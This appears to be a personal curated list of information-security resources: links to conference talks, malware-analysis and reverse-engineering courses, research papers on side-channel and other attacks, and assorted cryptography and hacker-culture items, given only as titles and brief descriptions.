- wallet.fail: Hacking the most popular cryptocurrency hardware wallets
- Reverse Engineering: Closed, heterogeneous platforms and the defenders’ dilemma Looking back at the last 20 years of RE and looking ahead at the next few SSTIC 2018 -- Thomas Dullien (“Halvar Flake”)
- Making C Less Dangerous in the Linux kernel
- Modchips of the State: Hardware implants in the supply-chain - CCC 2018
- Workshop-BSidesMunich2018: ARM shellcode and exploit development - BSidesMunich 2018
- REhint's Publications.
- INFILTRATE 2019 Demo Materials
- A Practical Approach to Purple Teaming
- The Advanced Threats Evolution: REsearchers Arm Race by @matrosov
- The Beginner Malware Analysis Course + VirusBay Access
- MISP Summit 05: MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone.
- ConPresentations by Maddie Stone.
- Venturing into the Dark- a review of Dark Side Ops 2: Adversary Simulation
- Expert voices disinvited from CyberCon
- Hack.lu 2019 Day #1 Wrap-Up
- 0x0g-2018-badge.
- DEFCON 2020: SAFEMODE, VILLAGES, BADGE, ics-forum
- Virtual Cybersecurity Conferences: An ongoing list of virtual cybersecurity conferences.
- The Open Source Security Software Hackathon by hack.lu
- The speaker and schedule data for GrayHat to populate Hacker Tracker and the main GrayHat website.
- r2con2020 stuff
- How to R&D hacking toys for fun & no-profit
- Offensive Development: Post-Exploitation Tradecraft in an EDR World x33fcon 2020
- WebSploit Labs workshop hosted by the Red Team Village during YASCON
- The AVAR International Conference is back!
- Japan Security Analyst Conference Virtual Edition
- SANS Virtual Summits Will Be FREE for the Community in 2021
Some good places to visit:
- hasherezade's 1001 nights
- List of Helpful Information Security Multimedia
- pocorgtfo: a "PoC or GTFO" mirror with extra article index, direct links and clean PDFs.
- FIDO ECDAA Algorithm
- stamparm: Miroslav Stampar Repositories (a lot of good stuff)
- Github repos:
- Damn Vulnerable Web Application:
- Nelson Brito's Source: This repository is a collection of information, code and/or tool, which I've released and/or presented in some of the most notorious conferences, helping the audience to study and understand some cybersecurity related topics.
- (pt-br)PwnLab: init
- Mamont's open FTP Index: a lot of open FTPs!!!
- fuzz.txt: Potentially dangerous files
- Free Training: New Certified Learning Paths: The Qualys Training team is eager to share all of the recent additions to our free training program, as well as provide insight into what is coming in 2019. You can expect to see regular updates as we continue to improve our training offerings!
- (pt-br)Catálogo de Fraudes: Lançado em 2008 para alertar a comunidade de ensino e pesquisa sobre os principais golpes em circulação na internet, o nosso Catálogo de Fraudes é hoje um repositório importante de mensagens classificadas como fraudulentas, que serve como fonte de informação para todo o Brasil.
- Daily Information Security Podcast ("StormCast")
- Hackerrank: Contains codes for some of the solutions to Hacker-rank problems
- Spoilerwall introduces a brand new concept in the field of network hardening
- abusing github commit history for the lulz
- resist_oped: 🕵🏽♀️ Identifying the author behind New York Time’s op-ed from inside the Trump White House.
- InfoSec BS Bingo
- How to fit all of Shakespeare in one tweet (and why not to do it!)
- Attrition.org: defacement rank.
- rot8000: rot13 for the Unicode generation (github)
- Reverse Engineering Pokémon GO Plus: TL;DR; You can clone a Pokemon GO Plus device that you own. pgpemu: github repo.
- grugq quotes
- Pivots & Payloads Board Game: Introducing the NEW SANS Pen Test Poster by SANS Institute
- Chess Steganography
- Enigma, the Bombe, and Typex
- (pt-br) Ícone da criptografia na 2ª Guerra Mundial, máquina Enigma tem exemplar no Brasil
- Enigma machine: This is a simulated Enigma machine. Letters to be encrypted enter at the boundary, move through the wire matrix, and exit.
- How I hacked modern Vending Machines
- A better zip bomb
- Goodbye-World: The last program that every developer writes.
- Dumb Password Rules
- Enigma I, Navy M3/M4 Machine Emulator.
- FYI, I'm going to drive home on Florida's Turnpike with a code that QR-enabled license plate readers will log in their ASCII databases ... which could trigger #antivirus software to QUARANTINE those databases by Rob Rosenberger.
- (pt-br)pivoting
- Posters, drawings...
- "Other good cyberpunk media to stream free on Tubi: Akira https://t.co/zNFOXzkdMP Ghost in the Shell https://t.co/ayGKJsGXsf Jin-Roh https://t.co/V6KUA0icSc Ergo Proxy https://t.co/uQv9WNGnHT AD Police https://t.co/UNBioD26MB Chappie https://t.co/YmLabtxk4z"
- [1808.00659] Chaff Bugs: Deterring Attackers by Making Software Buggier
- [1809.08325] The Rise of Certificate Transparency and Its Implications on the Internet Ecosystem
- DeepMasterPrints: Generating MasterPrints for Dictionary Attacks via Latent Variable Evolution
- Stealing Webpages Rendered on Your Browser by Exploiting GPU Vulnerabilities
- The Hunt for 3ve: Taking down a major ad fraud operation through industry collaboration.
- Page Cache Attacks: We present a new hardware-agnostic side-channel attack that targets one of the most fundamental software caches in modern computer systems: the operating system page cache.
- Identification and Illustration of Insecure Direct Object References and their Countermeasures
- China’s Maxim: Leave No Access Point Unexploited: The Hidden Story of China Telecom’s BGP Hijacking
- Listen to Your Key: Towards Acoustics-based Physical Key Inference
- Mailto: Me Your Secrets. On Bugs and Features in Email End-to-End Encryption
- Everything Old is New Again: Binary Security of WebAssembly
- Discovering Suspicious APT Behaviors by Analyzing DNS Activities
- Harvard Belfer National Cyber Power Index 2020
- Quantum Blockchain using entanglement in time